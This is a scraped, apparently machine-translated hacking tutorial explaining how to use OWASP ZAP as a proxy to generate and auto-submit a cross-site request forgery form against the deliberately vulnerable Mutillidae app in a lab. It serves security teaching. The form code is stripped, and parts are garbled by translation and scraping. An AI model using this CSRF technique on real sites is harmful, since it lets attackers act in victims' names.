قالب وردپرس درنا توس
Home / Tips and Tricks / How to misuse Session Management with OWASP ZAP «Null Byte :: WonderHowTo

How to misuse Session Management with OWASP ZAP «Null Byte :: WonderHowTo



It's always a good idea to know how an attack at the basic level works. Manual techniques for use often find holes that even the most sophisticated tool can not provide. However, sometimes using one of these tools can make the job a lot easier, especially if you have a solid foundation for doing so. Such a tool can help us to carry out a cross-site request forgery with minimal difficulty.

Introduction to OWASP ZAP

The OWASP Zed Attack Proxy (ZAP) is a popular open source web application security scanner developed by the OWASP project. It is a Java-based tool that provides a convenient GUI and comes standard with Kali Linux. In addition to its powerful scanner that can automatically detect many vulnerabilities, it also includes many useful features for manual testing such as spidering, fuzzing, and proxying.

The right section of ZAP contains the scanners Functionality, where all you have to do is enter a valid URL and click on "Attack". This section also displays details about individual requests and responses.

The left panel shows the layout of a website after scanning or spidering; This is useful for separating individual pages and providing a comprehensive overview of the content of a website. Finally, the lower section of ZAP contains the request history, the search, and any alerts that might be displayed during a review.

In this tutorial, we use ZAP as a proxy to intercept traffic. Once our browser is set to manual proxy configuration, ZAP will automatically act as a proxy; This makes it easier to view and modify requests that come from the application being tested.

Step 1: Configure the Environment

For this demonstration, we use the vulnerable Web application Mutillidae, which is included as part of the Metasploitable 2 virtual machine. OWASP ZAP is used to catch all requests and modify them to execute CSRF.

To replicate this attack, we need to set up two different users. Create a new account for each of the two users by calling the following page with the appropriate IP address:

  http://172.16.1.102/mutildae/index.php?page=register.php 

Here are we can user1 with the password password :

and similar user2 with the password hunter2 :

Now we can log in as user1 by visiting the login page:

Before we Starting ZAP We need to make sure that our browser is configured correctly to intercept traffic. In Firefox, go to "Settings," click "Advanced," followed by "Network," and finally "Settings." Set the proxy configuration to manual and use 127.0.0.1 (localhost) on port 80 . Enable "Use this proxy server for all protocols" and make sure no entries are listed under "No proxy for". Now click on "OK" and we are ready to open ZAP.

Step 2: Open ZAP

When we start ZAP, we will be using a few persistence options. At the moment, we can just accept the default, which does not continue the session:

Now, in our web application, go to the following URL to add a blog entry for user1:

  http://172.16.1.102/mutildae/index.php?page=add-to-your-blog.php 

Enter here your wish and click on "Save blog entry" to add the blog: [19659026] How to Abuse Session Management with OWASP ZAP ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>

Since ZAP is already listening in as a proxy, we can see that this request appears at the bottom of the window:

This includes information such as URL, Server response code, request size, and method of communicating with the server. If you look in the upper-right corner of ZAP, you can view the request by clicking the Request tab:

This gives us a little more information, including all Cookies or tokens in action as well as the text that we have submitted to the blog.

Step 3: Starting the CSRF Attack

In the previous tutorial we learned how to change HTML to create a new trick file for unsuspecting users to submit malicious data in our name. ZAP is useful in that it refers to CSRF because it has a feature that basically automatically reduces it to us.

Please note that this feature generates a demo form that we can use. A more realistic approach would be to modify the demo form to be automatically sent when loading, as in the previous article. In essence, these are two methods to achieve the same goal.

Right-click on the application and choose Generate CSRF Test Form, which opens in a new tab:

This contains the parameters and Values ​​of the POST request and can be modified by an attacker. To execute this attack, JavaScript can be used to automatically submit this form when it is loaded:

  







http://172.16.1.102/mutildae/index.php?page=add-to-your-blog.php

add-to-your-blog-php-submit-button
blog_entry [19659042] csrf-token

This example is just a simple blog post, but a more malicious attack could target bank information or other private information.

Next we can go back to the login page and sign up as user2, which will simulate the victim of this attack. In fact, this would be a random other user, but for demonstration purposes we have to sign up and play the victim. Once the form is loaded and the request passes, we can see User1's blog entry appear under User2's current entries:

Again, there is nothing malicious, but an improper one Session treatment was abused to fake a cross-site request. If this application contains more sensitive data, an attacker could quickly exploit this vulnerability to personal or financial benefit.

Concluding Remarks

OWASP ZAP is a powerful tool for testing web applications for common vulnerabilities. In this guide, we learned how to use one of the many features that are used for manual testing to intercept traffic and perform a CSRF attack. While this example was trivial in that we only exploited a simple blog post, real-world scenarios can be much more devastating, especially when personal or financial data is involved.

In the 2017 OWASP Top 10 edition, CSRF was omitted One of the most critical security risks for web applications. This is largely due to the move of many applications that use frameworks that automatically protect against CSRF attacks. But even though it has been dropped from the top ten list, CSRF remains a legitimate security issue to this day. There are just so many websites that do not consider basic security, and sooner or later you have to cross paths with this vulnerability.

Do not miss: Beginner's Guide to OWASP Juice Shop, Your Practice Hacking Reasons to Top 10 Web App Weakest Points

Title image by skeeze / Pixabay; Screenshots of drd_ / zero byte

Source link